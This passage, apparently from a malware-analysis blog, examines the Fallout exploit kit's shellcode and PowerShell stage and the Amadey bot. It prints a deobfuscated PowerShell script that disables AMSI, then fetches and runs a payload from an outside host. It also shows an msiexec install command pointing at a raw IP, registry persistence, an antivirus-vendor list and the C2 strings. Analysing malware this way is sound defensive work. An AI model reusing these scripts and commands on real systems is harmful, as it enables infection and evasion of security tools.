class="p">(</span><span class="kt">char</span><span class="p">)</span><span class="o">*</span><span class="n">a1</span> <span class="o">&lt;=</span> <span class="mi">90</span> <span class="p">)</span> <span class="o">*</span><span class="n">a1</span> <span class="o">+=</span> <span class="mi">32</span><span class="p">;</span> <span class="o">++</span><span class="n">a1</span><span class="p">;</span> <span class="p">}</span> <span class="k">return</span> <span class="n">result</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p>The lowercased name is then hashed, again with the dualaccModFFF1Hash algorithm, and compared against the following hashes.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x3F5406DE 0x25CD0541 0x0F050309 0x161803EC 0x19F3044B </code></pre></div></div> <p><img src="https://nao-sec.org/assets/2019-07-09/04.jpg" alt="" /></p> <p>Two of the five process names could be identified (Wireshark and Fiddler, both traffic-inspection tools); the remaining three are unidentified.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&gt;&gt;&gt;</span> <span class="nb">hex</span><span class="p">(</span><span class="n">dualaccModFFF1Hash</span><span class="p">(</span><span class="s">"wireshark.exe"</span><span class="p">))</span> <span class="s">'0x25cd0541'</span> <span class="o">&gt;&gt;&gt;</span> <span class="nb">hex</span><span class="p">(</span><span class="n">dualaccModFFF1Hash</span><span class="p">(</span><span class="s">"fiddler.exe"</span><span class="p">))</span> <span class="s">'0x19f3044b'</span> </code></pre></div></div> <p>As in v3, the shellcode then downloads, decodes and executes encrypted PowerShell code.</p> <h2 id="powershell">PowerShell</h2> <p>The PowerShell command that is executed looks like this (the base64-encoded command is elided):</p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">powershell.exe</span><span class="w"> </span><span class="nt">-w</span><span class="w"> </span><span class="nx">hidden</span><span class="w"> </span><span class="nt">-noni</span><span class="w"> </span><span class="nt">-enc</span><span class="w"> </span><span class="nx">…</span><span class="w"> </span></code></pre></div></div> <p>Decoding and cleaning it up gives the following.</p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kr">try</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nv">$l1Il1</span><span class="w">
</span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">Ref</span><span class="p">]</span><span class="o">.</span><span class="nf">Assembly</span><span class="p">;</span><span class="w"> </span><span class="nv">$l1Il1lI1IIl</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$l1Il1</span><span class="o">.</span><span class="nf">GetType</span><span class="p">(</span><span class="s2">"System.Management.Automation.AmsiUtils"</span><span class="p">);</span><span class="w"> </span><span class="nv">$I1Il11l1Il</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$l1Il1lI1IIl</span><span class="o">.</span><span class="nf">GetField</span><span class="p">(</span><span class="s2">"amsiInitFailed"</span><span class="p">,</span><span class="w"> </span><span class="s1">'NonPublic,Static'</span><span class="p">);</span><span class="w"> </span><span class="nv">$I1Il11l1Il</span><span class="o">.</span><span class="nf">SetValue</span><span class="p">(</span><span class="bp">$null</span><span class="p">,</span><span class="w"> </span><span class="bp">$true</span><span class="p">);</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="kr">catch</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="p">};</span><span class="w"> </span><span class="n">Add-Type</span><span class="w"> </span><span class="nt">-TypeDefinition</span><span class="w"> </span><span class="s2">"using System;using System.Diagnostics;using System.Runtime.InteropServices;[StructLayout(LayoutKind.Sequential)]public struct I1lII1Il1{public IntPtr IIlI1;public IntPtr lIl1I1II1l;public uint IIIIIlII;public uint Il111lIl1I1I;}[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct lI1ll1Il1I1l{public uint IIIlI;public string Il1l1;public string lI1ll;public string Il111IIIl;public uint I1lIl1ll1I;public 
uint IlIIIl1;public uint ll11Ill;public uint Il1IlIl1;public uint lIlIII;public uint lI1lIlI;public uint lI1l11;public uint Ill1Il;public short IlII1;public short IllIll;public IntPtr llIlIlIlI;public IntPtr Ill1IlIlI;public IntPtr IllIlllI1I1;public IntPtr I1III;};public static class l1Il11III{[DllImport(""kernel32.dll"",SetLastError=true)]public static extern bool CreateProcess(string IIlIII,string IlIlI,IntPtr I11l1I,IntPtr l1lI1,bool IlI11II1111,uint l111I,IntPtr lIII1IllI,string I1Il1lI,ref lI1ll1Il1I1l ll11IIl1I,out I1lII1Il1 lII1II);}"</span><span class="p">;</span><span class="w"> </span><span class="nv">$lll1IllI1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s2">"</span><span class="nv">$</span><span class="nn">env</span><span class="p">:</span><span class="nv">userprofile</span><span class="s2">\AppData\LocalLow\</span><span class="si">$(</span><span class="o">-join</span><span class="p">((</span><span class="mi">48</span><span class="o">..</span><span class="mi">57</span><span class="si">)</span><span class="s2">+(65..90)+(97..122)|Get-Random -Count 8|%{[char]</span><span class="bp">$_</span><span class="s2">})).tmp"</span><span class="p">;</span><span class="w"> </span><span class="nv">$I1l11I1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">'http://beahero4u.com/1950-01-11/O8Zr'</span><span class="p">;</span><span class="w"> </span><span class="nv">$cli</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">New-Object</span><span class="w"> </span><span class="nx">Net.WebClient</span><span class="p">);</span><span class="w"> </span><span class="nv">$cli</span><span class="o">.</span><span class="n">Headers</span><span class="p">[</span><span class="s1">'User-Agent'</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span 
class="s1">'J57P9y1i30M102X5'</span><span class="p">;</span><span class="w"> </span><span class="nv">$cli</span><span class="o">.</span><span class="nf">DownloadFile</span><span class="p">(</span><span class="nv">$I1l11I1</span><span class="p">,</span><span class="w"> </span><span class="nv">$lll1IllI1</span><span class="p">);</span><span class="w"> </span><span class="nv">$I1I1l1IIllI1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">New-Object</span><span class="w"> </span><span class="nx">lI1ll1Il1I1l</span><span class="p">;</span><span class="w"> </span><span class="nv">$I1I1l1IIllI1</span><span class="o">.</span><span class="nf">IlII1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="n">x0</span><span class="p">;</span><span class="w"> </span><span class="nv">$I1I1l1IIllI1</span><span class="o">.</span><span class="nf">IIIlI</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">System.Runtime.InteropServices.Marshal</span><span class="p">]::</span><span class="n">SizeOf</span><span class="p">(</span><span class="nv">$I1I1l1IIllI1</span><span class="p">);</span><span class="w"> </span><span class="nv">$IIl1Il1I</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">New-Object</span><span class="w"> </span><span class="nx">I1lII1Il1</span><span class="p">;</span><span class="w"> </span><span class="p">[</span><span class="n">l1Il11III</span><span class="p">]::</span><span class="n">CreateProcess</span><span class="p">(</span><span class="nv">$lll1IllI1</span><span class="p">,</span><span class="w"> </span><span class="nv">$lll1IllI1</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">IntPtr</span><span class="p">]::</span><span class="n">Zero</span><span class="p">,</span><span class="w"> </span><span 
class="p">[</span><span class="n">IntPtr</span><span class="p">]::</span><span class="nx">Zero</span><span class="p">,</span><span class="w"> </span><span class="bp">$false</span><span class="p">,</span><span class="w"> </span><span class="nx">0x00000008</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">IntPtr</span><span class="p">]::</span><span class="nx">Zero</span><span class="p">,</span><span class="w"> </span><span class="s2">"c:"</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">ref</span><span class="p">]</span><span class="nv">$I1I1l1IIllI1</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">ref</span><span class="p">]</span><span class="nv">$IIl1Il1I</span><span class="p">)</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">out-null</span><span class="p">;</span><span class="w"> </span></code></pre></div></div> <p>The script first tries to disable AMSI by setting the non-public static field AmsiUtils.amsiInitFailed to true (wrapped in try/catch so it fails silently on hosts where the field does not exist), then downloads the payload with a hard-coded User-Agent to a randomly named .tmp file under %USERPROFILE%\AppData\LocalLow, and finally starts it with CreateProcess using creation flag 0x00000008 (DETACHED_PROCESS). That is how the final malware is downloaded and executed; the fixed User-Agent string and the LocalLow drop path are useful detection points.</p> <h2 id="conclusion">Conclusion</h2> <p>Fallout has been heavily updated, which makes analysis considerably harder. It now uses techniques such as Diffie-Hellman key exchange, VM detection and process detection, and further updates should be expected.</p>
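<p>The process-name check described in the Shellcode section above can be reproduced offline. The following Python is an added example, not code from the nao_sec post: it ports dualaccModFFF1Hash, applies the same ASCII-only lowercasing as zz_tolowercase, and tests candidate tool names against the five hashes listed in the post. Because the routine is identical to the Adler-32 checksum, zlib.adler32 is used as a cross-check. The candidate names beyond wireshark.exe and fiddler.exe are constructed for illustration only and do not claim to identify the three unknown hashes.</p>

```python
# Added example (not from the nao_sec post): port of the Fallout v4 shellcode's
# dualaccModFFF1Hash and of its process-name check, for offline verification.
#
# The routine is the Adler-32 checksum: accumulator a starts at 1, b at 0, both
# are reduced mod 0xFFF1 (65521) per byte, and the result is a + (b << 16).
# zlib.adler32 therefore returns identical values and serves as a cross-check.
import zlib
from typing import Dict, Iterable, Optional

# The five hashes the shellcode compares running process names against (from the
# post).  Two are identified there; the remaining three are unknown.
FALLOUT_V4_PROCESS_HASHES = [0x3F5406DE, 0x25CD0541, 0x0F050309, 0x161803EC, 0x19F3044B]


def dualacc_mod_fff1_hash(data: bytes) -> int:
    """Straight port of the decompiled routine (v2 is the 'a' sum, v3 the 'b' sum)."""
    v2, v3 = 1, 0
    for byte in data:
        v2 = (v2 + byte) % 0xFFF1
        v3 = (v3 + v2) % 0xFFF1
    return v2 + (v3 << 16)


def matches_zlib(data: bytes) -> bool:
    """True when the port agrees with zlib.adler32 on this input."""
    return dualacc_mod_fff1_hash(data) == zlib.adler32(data)


def zz_tolowercase(name: str) -> str:
    """Mirror of the shellcode's zz_tolowercase: only ASCII 'A'..'Z' are shifted by 32."""
    return "".join(chr(ord(c) + 32) if "A" <= c <= "Z" else c for c in name)


def process_name_hash(name: str) -> int:
    """Hash a process name the way the shellcode does: lowercase first, then hash the bytes."""
    return dualacc_mod_fff1_hash(zz_tolowercase(name).encode("ascii"))


def match_hashes(candidates: Iterable[str], targets: Iterable[int]) -> Dict[int, Optional[str]]:
    """Map each target hash to the candidate name producing it, or None if no candidate matches."""
    by_hash = {process_name_hash(c): c for c in candidates}
    return {t: by_hash.get(t) for t in targets}


if __name__ == "__main__":
    # Constructed candidate list: the two names the post recovered plus a few
    # other common analysis tools.  Only the two known names are expected to hit;
    # the others are here to show the no-match case, not to claim identification.
    candidates = ["Wireshark.exe", "fiddler.exe", "procmon.exe", "x64dbg.exe", "ollydbg.exe"]
    for h, name in match_hashes(candidates, FALLOUT_V4_PROCESS_HASHES).items():
        print(f"0x{h:08X} -> {name or '(unknown)'}")
```

<p>Because the routine is plain Adler-32, a large process-name wordlist can be pushed through zlib.adler32 directly; the explicit port is kept here so that the lowercasing step matches the shellcode exactly.</p>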
  62. Analyzing Amadey

    Sat, 27 Apr 2019 15:00:00 -0000

    Initial Access

    Amadey is installed by msiexec.exe when the malicious Excel file is opened. Judging from the document technique, the threat actor is considered to be TA505.

    - Excel 4.0 Macro Utilized by TA505 to Target Financial Institutions Recently
    - Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware

    https://app.any.run/tasks/3430e711-7bb1-49b4-ac07-86b1a6b5c784

    The download URL is as follows:

        msiexec.exe STOP=1 /i http://109.234.38.177/dom4 /q ksw='%TEMP%'

    First payload

    The first payload is packed. Extract the original PE using the hollows_hunter mode of tknk_scanner.

    Amadey

    The dumped PE is compiled with MinGW:

        PE: compiler: MinGW(-)[-]
        PE: linker: GNU linker ld (GNU Binutils)(2.56*)[EXE32]

    It contains symbol information. Amadey has the following functions:

        _Z10aBypassUACv
        _Z10aCharToIntPc
        _Z10aGetOsArchv
        _Z10aIntToChari
        _Z11aAutoRunSetPc
        _Z11aCheckAdminv
        _Z11aCreateFilePc
        _Z11aFileExistsPKc
        _Z11aGetTempDirv
        _Z11aProcessDllPcS_
        _Z11aProcessExePcS_S_S_
        _Z11aRunAsAdminPc
        _Z12aGetHostNamev
        _Z12aGetSelfPathv
        _Z12aGetUserNamev
        _Z12aProcessTaskPc
        _Z12aResolveHostPc
        _Z12aWinSockPostPcS_S_
        _Z13aDropToSystemPc
        _Z13aGetProcessILv
        _Z14aCreateProcessPc
        _Z14aGetProgramDirv
        _Z15aUrlMonDownloadPcS_
        _Z16aDirectoryExistsPc
        _Z16aExtractFileNamePc
        _Z16aGetHomeDriveDirv
        _Z16aProcessDllLocalPcS_S_S_
        _Z16aProcessExeLocalPcS_S_S_
        _Z19aGetSelfDestinationi
        _Z5aCopyPcii
        _Z5aParsPcS_
        _Z6aBasici
        _Z6aGetIdv
        _Z6aGetOsv
        _Z6aMkDirPc
        _Z7aPathAVPc
        _Z7aRaportPcS_
        _Z8aCheckAVv
        _Z8aDecryptPc
        _Z8aPosLastPcS_
        _Z9aCopyFilePcS_
        _Z9aFileSizePc
        _Z9aFillCharPc
        _Z9aFreeFilePc
        _Z9aPosFirstPcS_
        _Z9aRunDll32PcS_

    The main function is as follows.

        int __cdecl main(int _Argc,char **_Argv,char **_Env)
        {
          char *pcVar1;

          /* 0x3ac8 97 main */
          FUN_00404020();
          FUN_00403cc0();
          _Z10aBypassUACv();
          pcVar1 = _Z12aGetSelfPathv();
          _Z13aDropToSystemPc(pcVar1);
          pcVar1 = _Z19aGetSelfDestinationi(0);
          _Z11aAutoRunSetPc(pcVar1);
          _Z6aBasici(0);
          return 0;
        }

    The _Z6aBasici function is as follows.

        /* WARNING: Globals starting with '_' overlap smaller symbols at the same address */
        void __cdecl _Z6aBasici(int param_1)
        {
          char *_Source;
          uint uVar1;
          int iVar2;

          /* 0x33fe 32 _Z6aBasici */
          FUN_00404020();
          _Z9aFillCharPc(&amp;stack0xffffeff4);
          _Z9aFillCharPc(&amp;stack0xffffddf4);
          _Z9aFillCharPc(&amp;stack0xffffdbf4);
          _Source = _Z8aDecryptPc(&amp;aDomain);
          strcat(&amp;stack0xffffddf4,_Source);
          _Source = _Z8aDecryptPc(&amp;aScript);
          strcat(&amp;stack0xffffdbf4,_Source);
          _Source = _Z8aDecryptPc(&amp;aParam0);
          strcat(&amp;stack0xffffeff4,_Source);
          _Source = _Z6aGetIdv();
          strcat(&amp;stack0xffffeff4,_Source);
          _Source = _Z8aDecryptPc(&amp;aParam1);
          strcat(&amp;stack0xffffeff4,_Source);
          _Source = _Z8aDecryptPc(&amp;aVers);
          strcat(&amp;stack0xffffeff4,_Source);
          uVar1 = _Z11aCheckAdminv();
          if ((uVar1 &amp; 0xff) == 1) {
            _Source = _Z8aDecryptPc(&amp;aParam2);
            strcat(&amp;stack0xffffeff4,_Source);
            strcat(&amp;stack0xffffeff4,"1");
          }
          else {
            _Source = _Z8aDecryptPc(&amp;aParam2);
            strcat(&amp;stack0xffffeff4,_Source);
            strcat(&amp;stack0xffffeff4,"0");
          }
          _Source = _Z8aDecryptPc(&amp;aParam3);
          strcat(&amp;stack0xffffeff4,_Source);
          _Source = _Z10aGetOsArchv();
          strcat(&amp;stack0xffffeff4,_Source);
          _Source = _Z8aDecryptPc(&amp;aParam4);
          strcat(&amp;stack0xffffeff4,_Source);
          _Source = _Z10aIntToChari(param_1);
          strcat(&amp;stack0xffffeff4,_Source);
          _Source = _Z8aDecryptPc(&amp;aParam5);
          strcat(&amp;stack0xffffeff4,_Source);
          iVar2 = _Z6aGetOsv();
          _Source = _Z10aIntToChari(iVar2);
          strcat(&amp;stack0xffffeff4,_Source);
          _Source = _Z8aDecryptPc(&amp;aParam6);
          strcat(&amp;stack0xffffeff4,_Source);
          uVar1 = _Z8aCheckAVv();
          _Source = _Z10aIntToChari(uVar1);
          strcat(&amp;stack0xffffeff4,_Source);
          _Source = _Z8aDecryptPc(&amp;aParam7);
          strcat(&amp;stack0xffffeff4,_Source);
          _Source = _Z12aGetHostNamev();
          strcat(&amp;stack0xffffeff4,_Source);
          _Source = _Z8aDecryptPc(&amp;aParam8);
          strcat(&amp;stack0xffffeff4,_Source);
          _Source = _Z12aGetUserNamev();
          strcat(&amp;stack0xffffeff4,_Source);
          strcat(&amp;stack0xffffeff4,"&amp;");
          if (param_1 == 0) {
            do {
              _Z9aFillCharPc(&amp;stack0xffffdff4);
              _Source = _Z12aWinSockPostPcS_S_(&amp;stack0xffffddf4,&amp;stack0xffffdbf4,&amp;stack0xffffeff4);
              strcat(&amp;stack0xffffdff4,_Source);
              _Z5aParsPcS_(&amp;stack0xffffdff4,"#");
              Sleep(_aTimeOut);
            } while( true );
          }
          if (param_1 == 1) {
            _Z12aWinSockPostPcS_S_(&amp;stack0xffffddf4,&amp;stack0xffffdbf4,&amp;stack0xffffeff4);
          }
          return;
        }

    Some important parameters are encoded. However, the encoding algorithm is very simple: each byte is the plaintext character plus the corresponding byte of a repeating key. The key is 8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7.

    Finally, the decoded strings, grouped by the function in which each is used:

    _Z11aAutoRunSetPc
        AutoRunCmd : REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d

    _Z8aCheckAVv
        AV00 : AVAST Software
        AV01 : Avira
        AV02 : Kaspersky Lab
        AV03 : ESET
        AV04 : Panda Security
        AV05 : Doctor Web
        AV06 : AVG
        AV07 : 360TotalSecurity
        AV08 : Bitdefender
        AV09 : Norton
        AV10 : Sophos
        AV11 : Comodo

    _Z12aWinSockPostPcS_S_
        CMD0 : &lt;c&gt;
        CMD1 : &lt;d&gt;

    _Z11aProcessDllPcS_
        dll : dll

    _Z7aRaportPcS_, _Z6aBasici
        domain : gohaiendo[.]com

    _Z19aGetSelfDestinationi
        DropDir : f64a428dfd
        DropName : cmualrc.exe

    _Z11aProcessExePcS_S_S_
        exe : exe

    _Z14aGetProgramDirv
        GetProgDir : ProgramData\

    _Z10aGetOsArchv, _Z6aGetOsv
        OS_AR0 : kernel32.dll
        OS_AR1 : GetNativeSystemInfo

    _Z6aBasici
        Param0 : id=
        Param1 : &amp;vs=
        Param2 : &amp;ar=
        Param3 : &amp;bi=
        Param4 : &amp;lv=
        Param5 : &amp;os=
        Param6 : &amp;av=
        Param7 : &amp;pc=
        Param8 : &amp;un=
        Vers : 1.22
        ZoneIdent : :Zone.Identifier

    _Z12aWinSockPostPcS_S_
        Post0 : 1310 (the raw bytes 13 and 10, i.e. CR LF)
        Post1 : HTTP/1.1
        Post2 : Accept: */*
        Post3 : Content-Type: application/x-www-form-urlencoded
        Post4 : Host:
        Post5 : Content-Length:
        Post6 : POST /

    _Z11aRunAsAdminPc
        RunAs : runas

    _Z9aRunDll32PcS_
        RunDll_0 : rundll32.exe

    _Z7aRaportPcS_, _Z6aBasici
        Script : ppk/index.php

    _Z11aCheckAdminv
        Shell : SHELL32.DLL

    _Z14aCreateProcessPc, _Z6aBasici
        TimeOut : 40133-98-10017 (raw differences 40, 133, -98, -100, 17 run together; this blob is not string data)

    _Z15aUrlMonDownloadPcS_
        URLMon_0 : urlmon
        URLMon_1 : URLDownloadToFileA

    Here is a simple Python decoding script. The commented block lists all encoded arrays; encoded_str is the one being decoded (the domain).

        '''
        domain=[0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D]
        AutoRunCmdr=[0x8A, 0xAA, 0xA9, 0x84, 0x74, 0x7D, 0x7D, 0x54, 0x58, 0x81, 0x7E, 0xA5, 0x85, 0xC0, 0x87, 0xA8, 0x9D, 0xAA, 0xA7, 0x93, 0xA3, 0x9C, 0x91, 0x85, 0xCC, 0x95, 0xD6, 0xA6, 0xD5, 0xD5, 0xCC, 0xAB, 0x95, 0x8A, 0xCB, 0x9E, 0xC8, 0xA3, 0xB0, 0xAA, 0x92, 0x73, 0xA7, 0xA3, 0xA9, 0x9A, 0xA6, 0xD7, 0x88, 0xC9, 0xA9, 0xD5, 0xCF, 0xD5, 0xA5, 0x94, 0xAA, 0xDA, 0xD4, 0x9F, 0xA8, 0xAB, 0x99, 0xA8, 0x95, 0x88, 0xD5, 0x95, 0xD6, 0x54, 0x8C, 0x9F, 0x9B, 0x9C, 0x9E, 0x51, 0x7D, 0xA4, 0xA4, 0xC7, 0x97, 0xD6, 0xAA, 0x84, 0x86, 0x95, 0x9D, 0x59, 0x62, 0xD8, 0x50, 0xB7, 0xA8, 0x9A, 0xA9, 0xAA, 0xA5, 0xA2, 0x51, 0x66, 0xA9, 0x58, 0xB5, 0x77, 0xAB, 0x96, 0xB5, 0xC0, 0x86, 0x66, 0x9C, 0x85]
        AV00=[0x79, 0xBB, 0xA3, 0xB7, 0x87, 0x59, 0x8C, 0xA3, 0x9C, 0xAD, 0xAA, 0xC3, 0xA2, 0xC9]#AV00
        AV01=[0x79, 0xDB, 0xCB, 0xD6, 0x94]
        AV02=[0x83, 0xC6, 0xD5, 0xD4, 0x98, 0xAB, 0xAC, 0x9F, 0xAF, 0x59, 0x7F, 0xC3, 0x92]
        AV03=[0x7D, 0xB8, 0xA7, 0xB8]
        AV04=[0x88, 0xC6, 0xD0, 0xC8, 0x94, 0x59, 0x8C, 0x99, 0x99, 0xAE, 0xA5, 0xCB, 0xA4, 0xDD]
        AV05=[0x7C, 0xD4, 0xC5, 0xD8, 0xA2, 0xAB, 0x59, 0x8B, 0x9B, 0x9B]
        AV06=[0x79, 0xBB, 0xA9]
        AV07=[0x6B, 0x9B, 0x92, 0xB8, 0xA2, 0xAD, 0x9A, 0xA0, 0x89, 0x9E, 0x96, 0xD7, 0xA2, 0xCD, 0xA8, 0xB2]
        AV08=[0x7A, 0xCE, 0xD6, 0xC8, 0x98, 0x9F, 0x9E, 0xA2, 0x9A, 0x9E, 0xA5]
        AV09=[0x86, 0xD4, 0xD4, 0xD8, 0xA2, 0xA7]
        AV10=[0x8B, 0xD4, 0xD2, 0xCC, 0xA2, 0xAC]
        AV11=[0x7B, 0xD4, 0xCF, 0xD3, 0x97, 0xA8]
        CMD0=[0x74, 0xC8, 0xA0]
        CMD1=[0x74, 0xC9, 0xA0]
        DLL=[0x9C, 0xD1, 0xCE]
        DropDir=[0x9E, 0x9B, 0x96, 0xC5, 0x67, 0x6B, 0x71, 0x98, 0x9C, 0x9D]
        DropName=[0x9B, 0xD2, 0xD7, 0xC5, 0x9F, 0xAB, 0x9C, 0x62, 0x9B, 0xB1, 0x98]
        exe=[0x9D, 0xDD, 0xC7]
        GetProgDir=[0x88, 0xD7, 0xD1, 0xCB, 0xA5, 0x9A, 0xA6, 0x78, 0x97, 0xAD, 0x94, 0xBE]
        OS_AR0=[0xA3, 0xCA, 0xD4, 0xD2, 0x98, 0xA5, 0x6C, 0x66, 0x64, 0x9D, 0x9F, 0xCE]
        OS_AR1=[0x7F, 0xCA, 0xD6, 0xB2, 0x94, 0xAD, 0xA2, 0xAA, 0x9B, 0x8C, 0xAC, 0xD5, 0xA4, 0xC9, 0xA1, 0x82, 0xA5, 0x9C, 0x9F]
        Param0=[0xA1, 0xC9, 0x9F]
        Param1=[0x5E, 0xDB, 0xD5, 0xA1]
        Param2=[0x5E, 0xC6, 0xD4, 0xA1]
        Param3=[0x5E, 0xC7, 0xCB, 0xA1]
        Param4=[0x5E, 0xD1, 0xD8, 0xA1]
        Param5=[0x5E, 0xD4, 0xD5, 0xA1]
        Param6=[0x5E, 0xC6, 0xD8, 0xA1]
        Param7=[0x5E, 0xD5, 0xC5, 0xA1]
        Param8=[0x5E, 0xDA, 0xD0, 0xA1]
        Post0=[0x45, 0x6F]
        Post1=[0x58, 0xAD, 0xB6, 0xB8, 0x83, 0x68, 0x6A, 0x62, 0x67]
        Post2=[0x79, 0xC8, 0xC5, 0xC9, 0xA3, 0xAD, 0x73, 0x54, 0x60, 0x68, 0x5D]
        Post3=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x8A, 0xB2, 0xA3, 0xC7, 0x6A, 0x84, 0x95, 0xA9, 0xA7, 0xA2, 0x99, 0x95, 0x92, 0xAB, 0x9E, 0xA7, 0xD1, 0x61, 0xDC, 0x64, 0xD9, 0xDD, 0xDD, 0x64, 0x9F, 0xA2, 0xD4, 0x9D, 0x91, 0xA9, 0xAB, 0xA3, 0x9B, 0x9E, 0x95, 0xA0, 0x9B, 0x9A, 0x9C]
        Post4=[0x80, 0xD4, 0xD5, 0xD8, 0x6D, 0x59]
        Post5=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x82, 0x9E, 0xA1, 0xC9, 0xA4, 0xCC, 0x6E, 0x59]
        Post6=[0x88, 0xB4, 0xB5, 0xB8, 0x53, 0x68]
        RunAs=[0xAA, 0xDA, 0xD0, 0xC5, 0xA6]
        RunDll_0=[0xAA, 0xDA, 0xD0, 0xC8, 0x9F, 0xA5, 0x6C, 0x66, 0x64, 0x9E, 0xAB, 0xC7, 0x50]
        Script=[0xA8, 0xD5, 0xCD, 0x93, 0x9C, 0xA7, 0x9D, 0x99, 0xAE, 0x67, 0xA3, 0xCA, 0xA0]
        Shell=[0x8B, 0xAD, 0xA7, 0xB0, 0x7F, 0x6C, 0x6B, 0x62, 0x7A, 0x85, 0x7F]
        TimeOut=[0x60, 0xEA, 0x00, 0x00, 0x44]
        URLMon_0=[0xAD, 0xD7, 0xCE, 0xD1, 0xA2, 0xA7]
        URLMon_1=[0x8D, 0xB7, 0xAE, 0xA8, 0xA2, 0xB0, 0xA7, 0xA0, 0xA5, 0x9A, 0x97, 0xB6, 0x9F, 0xAA, 0x9D, 0xA5, 0x9C, 0x77]
        Vers=[0x69, 0x93, 0x94, 0x96]
        ZoneIdent =[0x72, 0xBF, 0xD1, 0xD2, 0x98, 0x67, 0x82, 0x98, 0x9B, 0xA7, 0xA7, 0xCB, 0x96, 0xCD, 0x99, 0xAB]
        '''
        # decode one array: subtract the repeating key byte-wise
        encoded_str=[0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D]
        Key="8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7"
        c=0
        while(1):
            length = len(encoded_str)
            if length &lt;= c:
                break
            length = len(Key)
            print(chr(encoded_str[c] - ord(Key[c % length])), end='')
            #print(encoded_str[c] - ord(Key[c % length]), end='')  # raw values instead of characters
            c += 1

    References

    https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/
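The string encoding described above (byte-wise addition of a repeating key) and the check-in body that _Z6aBasici assembles can be reproduced offline. The following Python is an added example, not code from the nao_sec post: it wraps the decoder in reusable functions, adds the inverse transform, handles the non-string case the TimeOut entry exhibits, and rebuilds the POST body in the parameter order the decompiled function uses. The key and the encoded arrays are copied from the post; the host-specific values fed to build_checkin are constructed and not taken from any sample.

```python
# Added example (not from the nao_sec post): the Amadey string decoder written as
# reusable functions, plus a reconstruction of the check-in body _Z6aBasici builds.
# Decoding is byte-wise subtraction of a repeating key: chr(enc[i] - key[i % len(key)]).
# The key and the encoded arrays are copied from the post; the check-in field values
# used in the demo are constructed and not taken from any real sample.
from typing import Dict, List

KEY = b"8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7"

# A subset of the encoded strings listed in the post (names as used there).
ENCODED: Dict[str, List[int]] = {
    "domain":   [0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D],
    "Script":   [0xA8, 0xD5, 0xCD, 0x93, 0x9C, 0xA7, 0x9D, 0x99, 0xAE, 0x67, 0xA3, 0xCA, 0xA0],
    "DropName": [0x9B, 0xD2, 0xD7, 0xC5, 0x9F, 0xAB, 0x9C, 0x62, 0x9B, 0xB1, 0x98],
    "Vers":     [0x69, 0x93, 0x94, 0x96],
    "Param0":   [0xA1, 0xC9, 0x9F],
    "Param1":   [0x5E, 0xDB, 0xD5, 0xA1],
    "Post0":    [0x45, 0x6F],
    "Post2":    [0x79, 0xC8, 0xC5, 0xC9, 0xA3, 0xAD, 0x73, 0x54, 0x60, 0x68, 0x5D],
    "Post6":    [0x88, 0xB4, 0xB5, 0xB8, 0x53, 0x68],
    "TimeOut":  [0x60, 0xEA, 0x00, 0x00, 0x44],
}


def decode_raw(encoded: List[int], key: bytes = KEY) -> List[int]:
    """Subtract the repeating key; returns raw differences, which may fall outside 0..255."""
    return [e - key[i % len(key)] for i, e in enumerate(encoded)]


def decode_string(encoded: List[int], key: bytes = KEY) -> str:
    """Decode to ASCII text.  Raises ValueError when the result is not printable ASCII
    (plus CR/LF/TAB).  That is what happens for the post's TimeOut entry: the blob is not
    string data, so the post's '40133-98-10017' is just the raw differences run together."""
    raw = decode_raw(encoded, key)
    if not all(0 <= v < 0x7F and (chr(v).isprintable() or chr(v) in "\r\n\t") for v in raw):
        raise ValueError(f"not an ASCII string: {raw}")
    return "".join(map(chr, raw))


def encode_string(text: str, key: bytes = KEY) -> List[int]:
    """Inverse transform (add the key byte-wise); handy for building test fixtures."""
    return [ord(ch) + key[i % len(key)] for i, ch in enumerate(text)]


def decode_all(table: Dict[str, List[int]], key: bytes = KEY) -> Dict[str, str]:
    """Decode every entry; non-string entries are reported as 'raw:' + their differences."""
    result: Dict[str, str] = {}
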